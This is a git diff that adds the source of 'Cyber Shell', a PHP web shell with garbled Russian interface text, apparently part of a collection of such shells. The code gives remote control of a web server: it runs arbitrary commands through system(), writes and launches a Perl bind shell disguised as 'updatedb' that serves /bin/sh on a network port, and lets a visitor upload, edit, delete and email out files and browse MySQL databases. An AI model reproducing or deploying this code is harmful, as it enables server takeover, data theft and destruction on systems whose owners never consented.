+    <td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?d=$df/$dirs[$i]&show"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=dir></a></span></td>
+    <td width="241" bgcolor="#FFFFF0"><a href="$PHP_SELF?d=$df/$dirs[$i]&show">$dirs[$i]</a></td>
+    <td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?deldir=$df/$dirs[$i]/">Óäàëèòü</a></td>
+    <td width="51" align="center" bgcolor="#EFFFFF"><span class="style8"><center>Êàòàëîã</center></span></td>
+    <td width="113" align="center" bgcolor="#FFFFF0">$perm</td>
+  </tr>
+EOF;
+}
+for ($i=0; $i<count($files); $i++) {
+$attr="";
+if (!$fi=@fopen("$df/$files[$i]","r+")){
+$attr=" ONLY_READ ";
+$read=" href=\"$PHP_SELF?edit=$df/$files[$i]&readonly\"";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
+else fclose($fi);
+if (!$fi=@fopen("$df/$files[$i]","r")){
+$attr=" Can't_READ ";
+$read="";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
+else fclose($fi);
+if ($attr==""){
+$attr=" READ/WRITE ";
+$read=" href=\"$PHP_SELF?edit=$df/$files[$i]\"";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";
+}
+$perm=perms("$df/$files[$i]");
+$it="file";
+switch (ext($files[$i])) {
+case ".txt": $it="txt"; break;
+case ".php": $it="txt"; break;
+case ".htm": $it="txt"; break;
+case ".log": $it="txt"; break;
+case ".pl": $it="txt"; break;
+case ".asm": $it="txt"; break;
+case ".bat": $it="txt"; break;
+case ".bash_profile": $it="txt"; break;
+case ".bash_history": $it="txt"; break;
+case ".ini": $it="txt"; break;
+case ".php3": $it="txt"; break;
+case ".html": $it="txt"; break;
+case ".cgi": $it="txt"; break;
+case ".inc": $it="txt"; break;
+case ".c": $it="txt"; break;
+case ".cpp": $it="txt"; break;
+}
+$fsize = fsize("$df/$files[$i]");
+echo <<< EOF
+  <tr height="1">
+    <td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?downloadfile=$df/$files[$i]"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=$it></a></span></td>
+    <td width="241" bgcolor="#00FFFF"><a$read>$files[$i] </a> ($fsize)</td>
+    <td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?rename=1&filetorename=$files[$i]&d=$df&diz">ren</a>/<a$write>del</a>/<a href="$PHP_SELF?downloadfile=$df/$files[$i]">get</a>/<a href="$PHP_SELF?mailfile=$df/$files[$i]">mail</a></td>
+    <td width="51" align="center" bgcolor="#FFEFEF"><span class="style8"><center>$attr</center></span></td>
+    <td width="113" align="center" bgcolor="#FFFFF9">$perm</td>
+  </tr>
+EOF;
+}
+echo "</table>";
+if (count($dirs)==0 && count($files)==0){
+echo <<< EOF
+<table width="505" height="24" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+  <tr>
+    <td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">Ïàïêà ïóñòà</td>
+  </tr>
+</table>
+EOF;
+}}
+
+$edit=$_REQUEST[edit];
+if (isset($_REQUEST[edit]) && (!empty($_REQUEST[edit])) && (!isset($_REQUEST[ashtml])) ){
+$file=fopen($edit,"r") or die ("Íåò äîñòóïà ê ôàéëó $edit");
+if (filesize($edit) > 0)
+$tfile=fread($file,filesize($edit)) or die ("Íåò äîñòóïà ê ôàéëó $edit");
+else $tfile = "";
+fclose($file);
+$tfile = htmlspecialchars($tfile,ENT_QUOTES);
+echo "
+<center>
+<form  action=\"$PHP_SELF\" method=\"POST\">";
+$mydir=updir($edit);
+echo "
+<a href=\"$PHP_SELF?d=$mydir&show\">Âåğíóòüñÿ ê $mydir/</a><br>
+Âû ğåäàêòèğóåòå ôàéë : $edit<br>
+<a href=\"$PHP_SELF?edit=$edit&ashtml\"><span class=\"style4\">Ïğîñìîòğåòü ıòîò ôàéë â âèäå HTML</span></a>
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+<textarea name=\"texoffile\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$tfile</textarea>
+<br><input type=\"hidden\" name=\"nameoffile\" value=\"$edit\" >
+";
+if (!isset($_REQUEST[readonly]))
+echo "<input type=\"submit\"  value=\"            Ñîõğàíèòü            \" >";
+echo "
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+</form>
+</center>
+";
+}
+if (isset($edit) && (!empty($edit)) && (isset($ashtml))){
+$mydir=updir($edit);
+echo "
+<center>
+<a href=\"$PHP_SELF?d=$mydir&show\">Âåğíóòüñÿ ê $mydir/</a><br>
+Âû ïğîñìàòğèâàåòå ôàéë : $edit
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+";
+readfile($edit);
+echo "
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+</center>
+";
+}
+
+if (isset($texoffile) && isset($nameoffile))
+{
+$texoffile=unbug($texoffile);
+$f = fopen("$nameoffile", "w") or die ("Íåò äîñòóïà ê ôàéëó $nameoffile");
+fwrite($f, "$texoffile");
+fclose($f);
+$mydir=updir($nameoffile);
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&show\">";
+die;
+}
+
+if (isset($_REQUEST[delfile]) && ($_REQUEST[delfile]!=""))
+{
+$delfile=$_REQUEST[delfile];
+$mydir=updir($delfile);
+$deleted = unlink("$delfile");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+die;
+}
+
+function deletedir($directory) {
+if ($dir=opendir($directory)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$directory/$file"))  {
+deletedir($directory."/".$file);} 
+else {unlink($directory."/".$file);}}}
+closedir($dir);
+rmdir("$directory/$file");
+}
+if (isset($_REQUEST[deldir]) && (!empty($_REQUEST[deldir]))){
+$deldir=$_REQUEST[deldir];
+$mydir=updir(updir($deldir));
+deletedir("$deldir");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+die;
+}
+
+if (isset($show)){showdir("$d");}
+
+{
+if (isset($_REQUEST[tools]))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+.: Äåéñòâèÿ äëÿ äàííîé ïàïêè :.
+</td>
+</tr>
+</table>
+</center>
+EOF;
+if (isset($_REQUEST[tools]) or isset($_REQUEST[tmkdir]))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Ñîçäàòü ïàïêó :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=hidden name=tools>
+<input type=text size=55 name=newdir value="$d/Íîâàÿ ïàïêà">
+<input type=submit value="ñîçäàòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($newdir) && ($newdir!=""))
+{
+$mydir=updir($newdir);
+mkdir($newdir,"7777");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+}
+
+if(@$_GET['rename']){
+echo "<b><font color=green>RENAME $d/$filetorename ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$filetorename</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$filetorename'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+@$rto=$_POST['rto'];
+if($rto){
+$fr1=$d."/".$filetorename;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+rename($fr1,$to1);
+echo "File <br><b>$filetorename</b><br>Renamed to <b>$rto</b><br><br>";
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=$PHP_SELF?d=$d&show\">";}
+echo $copyr;
+exit;
+}
+
+if (isset($tools) or isset($tmkfile))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Ñîçäàòü ôàéë :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=text size=55 name=newfile value="$d/newfile.php">
+<input type=hidden name=tools>
+<input type=submit value="ñîçäàòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($newfile) && ($newfile!="")){
+$f = fopen("$newfile", "w+");
+fwrite($f, "");
+fclose($f);
+$mydir=updir($newfile);
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+}
+
+if (isset($tools) or isset($tbackdoor))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Îòêğûòü ïîğò :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+Èìÿ ñêğèïòà: <input type=text size=13 name=bfileneme value="bind.pl"> Ïîğò: <input type=text size=10 name=bport value="65426">
+<input type="hidden" name="d" value="$d" >
+<input type=hidden name=tools>
+<input type=submit value="âûïîëíèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($bfileneme) && ($bfileneme!="") && isset($bport) && ($bport!="")){
+$script="
+#!/usr/bin/perl
+\$port = $bport; 
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+\$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";
+
+$f = fopen("$d/$bfileneme", "w+");
+fwrite($f, $script);
+fclose($f);
+system("perl $d/$bfileneme");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$d&show\">";
+}
+
+if (isset($tools) or isset($tbash))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="GET">
+<input type="hidden" name="d" value="$d" >
+.: Âûïîëíèòü êîìàíäó :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=hidden name=diz>
+<input type=hidden name=tbash>
+<input type=text size=55 name=cmd value="$cmd">
+<input type=submit value="âûïîëíèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($cmd) && ($cmd!="")){
+echo "<pre><div align=\"left\">";
+system($cmd);
+echo "</div></pre>";
+}
+
+if (isset($tools) or isset($tupload)){
+$updir="$d/"; 
+if(empty($go)) {
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form ENCTYPE="multipart/form-data"  action="$PHP_SELF" method="post">
+.: Çàêà÷àòü ôàéë â òåêóùèé êàòàëîã :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<INPUT NAME="userfile" TYPE="file" SIZE="40">
+<input type="hidden" name="d" value="$d">
+<input type=hidden name=diz>
+<input type=hidden name=tupload>
+<input type="submit" name=go value="Îòïğàâèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+}
+else {
+if (is_uploaded_file($userfile)) { 
+$fi = "Çàêà÷åí ôàéë $userfile_name ğàçìåğîì $userfile_size áàéò â äèğåêòîğèş $updir";
+}
+echo "$fi<br><a href='$PHP_SELF?d=$d&show&tupload'>Íàçàä ê êàòàëîãó</a>";
+}
+if (is_uploaded_file($userfile)) {
+$dest=$updir.$userfile_name;
+move_uploaded_file($userfile, $dest);
+}}
+
+if ((isset($db_server)) || (isset($db_user)) || (isset($db_pass))  ){
+mysql_connect($db_server, $db_user, $db_pass) or die("íå ìîãó ïîäêëş÷èòüñÿ ê áàçå");
+}
+
+if ((isset($dbname)) and (isset($table)) )
+{
+foreach($_POST as $var => $val)
+if (substr($var,0,7) == 'newpole'){
+if (substr($var,7,strlen($var)) !== ''){
+$indif=substr($var,7,strlen($var));
+echo " $val ";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+if ($xvar == "") 
+$xvar .= $indif;
+else
+$xvar .= ",".$indif;
+if ($xval == "") 
+$xval .= "'$val'";
+else
+$xval .= ",'$val'";
+}}
+
+if ($xvar != ""){
+mysql_query("INSERT INTO $table ($xvar) values ($xval)");
+}
+
+echo "<a href=$PHP_SELF?showtables=$dbname&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Íàçàä ê ñïèñêó òàáëèö ÁÄ:$dbname</a>";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+$re=mysql_query("select * from $table");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
+}}
+echo "<td></td></tr>";
+
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+$param="limit $_SESSION[limit]";
+
+$re=mysql_query("select * from $table $param");
+
+while($res=mysql_fetch_array($re)){
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if (!$pixidname){
+$pixidname=$var;
+$pixid=$val;
+}
+if ($nvar == 128945432){
+$valtext=untag($val);
+if ($valtext == "") $valtext="=Ïóñòî=";
+
+
+if ($_SESSION[lenth] == "on"){
+if (strlen($valtext)>40){
+$valtext=substr($valtext,0,40);
+$valtext .="...";
+}}
+
+echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&var=$var&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$valtext</a></td>";
+}}
+
+echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass&del>Óäàëèòü</a></td></tr>";
+$pixidname='';
+$pixid='';
+}
+
+echo "<form  action=\"$PHP_SELF\" method=\"POST\">";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
+}}
+echo "<td></td></tr>";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#FFFFFF' bordercolor='#FFFFFF'><center><input type='text' name='newpole$var' value='$var' size='5'></center></td>";
+}}
+echo "</tr>";
+echo "</table>";
+echo "<input type=\"submit\"  value=\"Äîáàâèòü íîâóş çàïèñü\" >";
+echo "
+<input type=\"hidden\" name=\"dbname\" value=\"$dbname\">
+<input type=\"hidden\" name=\"table\" value=\"$table\">
+<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
+<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
+<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
+";
+echo "</form>";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($pixidname)) and (isset($pixid)) and (isset($del))){
+echo "hello";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+mysql_query("delete from $mtable where $pixidname='$pixid'");
+echo "<head><meta http-equiv=\"refresh\" content=\"0;URL=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass\"></head>";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid)) and (isset($textofmysql))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+mysql_query("update $mtable set $var='$textofmysql' where $pixidname=$pixid");
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+$re=mysql_query("select $var from $mtable where $pixidname='$pixid'");
+$res=mysql_fetch_array($re);
+$text=untag($res[$var]);
+
+echo "
+<form  action=\"$PHP_SELF\" method=\"POST\">
+<textarea name=\"textofmysql\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$text</textarea>
+<input type=\"hidden\" name=\"dbname\" value=\"$dbname\" >
+<input type=\"hidden\" name=\"mtable\" value=\"$mtable\" >
+<input type=\"hidden\" name=\"var\" value=\"$var\" >
+<input type=\"hidden\" name=\"pixidname\" value=\"$pixidname\" >
+<input type=\"hidden\" name=\"pixid\" value=\"$pixid\" >
+<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
+<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
+<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
+<br><input type=\"submit\"  value=\"            Èçìåíèòü            \" >
+</form>
+<a href=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Âåğíóòüñÿ ê ñïèñêó</a>
+";
+}
+
+if (isset($showdb) && empty($showtables)){
+$re=mysql_query("show databases");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>Ñïèñîê äîñòóïíûõ ÁÄ:</span></div></center></td></tr>";
+while($res=mysql_fetch_array($re)){
+echo "<tr><td><center><a href=$PHP_SELF?showtables=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></center></td></tr>";
+}
+echo "</table>";
+}
+if (isset($showtables) and !empty($showtables)){
+
+if (isset($xlimit)){
+$_SESSION[limit]=$xlimit;
+if (isset($xlenth))
+$_SESSION[lenth]=$xlenth;
+else $_SESSION[lenth]="";
+}
+
+echo "<a href=$PHP_SELF?showdb&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Íàçàä ê ñïèñêó ÁÄ</a>";
+$re=mysql_query("SHOW TABLES FROM $showtables");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>$showtables - Ñïèñîê òàáëèö: </span></div></center></td></tr>";
+while($res=mysql_fetch_array($re)){
+echo "<tr><td><center><a href=$PHP_SELF?dbname=$showtables&table=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></td></tr>";
+}
+echo "</table>";
+
+if (($_SESSION[lenth]) == "on")
+$ch="checked";
+else
+$ch="";
+
+echo <<< EOF
+<form  action="$PHP_SELF" method="get">
+<input type="hidden" name="showtables" value="$showtables" >
+<input type="hidden" name="db_server" value="$db_server" >
+<input type="hidden" name="db_user" value="$db_user" >
+<input type="hidden" name="db_pass" value="$db_pass" >
+îãğàíè÷åíèå íà êîëè÷åñòâî âûâîäèìûõ ïîëåé:<br>
+<select name="xlimit">
+  <option value="0">&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1074;&#1089;&#1105;</option>
+  <option value="10">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 10</option>
+  <option value="20">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 20</option>
+  <option value="30">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 30</option>
+  <option value="50">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 50</option>
+  <option value="100">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 100</option>
+  <option value="200">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 200</option>
+  <option value="500">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 500</option>
+  <option value="1000">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 1000</option>
+  <option value="5000">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 5000</option>
+</select>
+<br>Âêëş÷èòü îãğàíè÷åíèå íà äëèíó âûâîäèìûõ ïîëåé <input name="xlenth" type="checkbox" value="on" $ch><br>
+<input type="submit"  value="Ïğèìåíèòü" >
+EOF;
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+echo "<br>Òåêóùåå îãğàíè÷åíèå: $_SESSION[limit]";
+}
+
+if (isset($tools) or isset($tmysql))
+echo "
+<center>
+<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCCC'>
+<tr height='10'>
+<td align='center' bordercolor='#ECE9D8' bgcolor='#FFF8FF'>
+.: MySQL :.
+</td>
+</tr height='10'>
+<tr>
+<td align='center' bordercolor='#ECE9D8' bgcolor='#FFFFFF'>
+<form name='zapros' method='get' action=''>
+<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
+<tr align='center' >
+<td>
+Host
+</td>
+<td>
+<input name='db_server' type='text' value='localhost'>
+</td>
+</tr>
+<tr align='center' >
+<td>
+Login MySQL
+</td> 
+<td>
+<input type='text' name='db_user' value=''> 
+</tr>
+<tr align='center' >
+<td>
+Password MySQL
+</td> 
+<td>
+<input type='text' name='db_pass' value=''>
+<input type='hidden' name='showdb'>
+</td> 
+</tr>
+<tr align='center' >
+<td>
+Èìÿ ÁÄ (íå îáÿçàòåëüíî)
+</td> 
+<td>
+<input type='text' name='showtables' value=''>
+</td> 
+</tr>
+<tr align='center' >
+<td>
+<input type='submit'>
+</td>
+<td>
+<input type='reset'>
+</td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+</center>
+";
+}
+echo <<< EOF
+<center>.:Cyber Shell (v 1.0):.<br>Copyright © <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</a>, 2002-2006</center>
+</td>
+</tr>
+</table>
+EOF;
+
+$d=tourl($d);
+echo "
+<center>
+<span class='style1'>
+<a href=$PHP_SELF?d=$d&diz&tmkdir>.: Ñîçäàòü ïàïêó :.</a>
+<a href=$PHP_SELF?d=$d&diz&tmkfile>.: Ñîçäàòü ôàéë :.</a>
+<a href=$PHP_SELF?d=$d&diz&tbackdoor>.: Îòêğûòü ïîğò äëÿ ïîäêëş÷åíèÿ :.</a><br>
+<a href=$PHP_SELF?d=$d&diz&tbash>.: Bash :.</a>
+<a href=$PHP_SELF?d=$d&diz&tupload>.: Çàêà÷àòü ôàéë :.</a>
+</span>
+</center>
+";
+}
+die;
+?>
diff --git a/138shell/C/cybershell.txt b/138shell/C/cybershell.txt
new file mode 100644
index 0000000..a008f87
--- /dev/null
+++ b/138shell/C/cybershell.txt
@@ -0,0 +1,1033 @@
+<?
+/***************************************************************************
+ *                           Cyber Shell (v 1.0)
+ *                            -------------------
+ *   copyright            : (C) Cyber Lords, 2002-2006
+ *   email                : pixcher@mail.ru
+ *
+ *   http://www.cyberlords.net 
+ *  
+ *   Coded by Pixcher
+ *   Lite version of php web shell 
+ ***************************************************************************/
+
+/***************************************************************************
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 2 of the License', or
+ *   ('at your option) any later version.
+ *
+ ***************************************************************************/
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@error_reporting(0);
+/****************************** Options ************************************/
+#ïàğîëü íà àâòîğèçàöèş 
+$aupassword="test";
+#åñëè ïàğîëü óñòàíîâëåí ïğè $hiddenmode="true", òî ê ñêğèïòó íóæíî îáğàùàòüñÿ ñ ïàğàìåòğîì pass=ïàğîëü , íàïğèìåğ shell.php?pass=mysecretpass
+$hiddenmode="false";
+#e-mail íà êîòîğûé ñêèäûâàşòñÿ âûáğàííûå ôàéëû
+$email="test@mail.ru";
+/***************************************************************************/
+$style="
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>";
+
+foreach($_POST as $key => $value) {$$key=$value;}
+foreach($_GET as $key => $value)  {$$key=$value;}
+
+if (isset($_GET[imgname]))
+{
+$img=array(
+'dir'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1mG6mv7ZbiBbxrhlUtJFMAiOVDbdjOAQAR26d880lzr2paU6T6hbp9gH+ulCKjJkqAQBK+4ZPPAqhDB4i0pXtbfRvtUYYFZluo0DAKq9Ccj7ufxqlq9n4p1qyksn0IQLKoQyNeRsF+dGzgdfu/rXi0ni4tJxZ2S9n3Vj/2Q==',
+'txt'=>
